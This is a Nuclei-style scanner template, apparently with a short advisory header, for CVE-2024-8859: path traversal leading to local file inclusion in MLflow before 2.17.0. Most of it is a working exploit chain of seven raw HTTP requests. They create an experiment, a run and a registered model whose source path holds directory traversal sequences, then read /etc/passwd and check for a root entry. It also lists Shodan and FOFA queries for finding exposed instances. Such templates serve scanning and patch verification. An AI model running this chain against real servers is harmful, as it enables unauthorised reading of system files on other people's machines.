Mlflow before 2.17.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
PoC代码[已公开]
id: CVE-2024-8859
info:
name: Mlflow < 2.17.0 - Local File Inclusion
author: gy741
severity: critical
description: |
Mlflow before 2.17.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation could allow an attacker to read sensitive files on the server.
remediation: |
Upgrade Mlflow to version 2.17.0 or later to mitigate the vulnerability.
reference:
- https://huntr.com/bounties/2259b88b-a0c6-4c7c-b434-6aacf6056dcb
- https://github.com/mlflow/mlflow/pull/13161
- https://nvd.nist.gov/vuln/detail/CVE-2024-8859
classification:
epss-score: 0.13636
epss-percentile: 0.94015
metadata:
max-request: 7
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
fofa-query:
- title="mlflow"
- app="mlflow"
tags: cve2024,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects
http:
- raw:
- |
POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}", "artifact_location": "dbfs:/"}
- |
POST /api/2.0/mlflow/runs/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"experiment_id": "{{EXPERIMENT_ID}}"}
- |
POST /ajax-api/2.0/mlflow/upload-artifact?run_uuid={{RUN_ID}}&path=a?/a HTTP/1.1
Host: {{Hostname}}
whatever
- |
POST /ajax-api/2.0/mlflow/experiments/delete HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"experiment_id": "{{EXPERIMENT_ID}}"}
- |
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}"}
- |
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}", "source": "dbfs:/{{RUN_ID}}/artifacts/a%3f/../../../../../../../../../../../../"}
- |
GET /model-versions/get-artifact?name={{randstr}}&version=1&path=etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
extractors:
- type: json
part: body_1
name: EXPERIMENT_ID
group: 1
json:
- '.experiment_id'
internal: true
- type: json
part: body_2
name: RUN_ID
group: 1
json:
- '.run.info.run_id'
internal: true
# digest: 4b0a00483046022100b41d3f4e412b2acbf61951d63aa1f3568df8cacbe4c1eb5d471b53019b9518c6022100a4fbb79d8e03462d6a4298979663e942cdaeeed9a3544debec82a39283ba3cb7:922c64590222798bb761d5b6d8e72950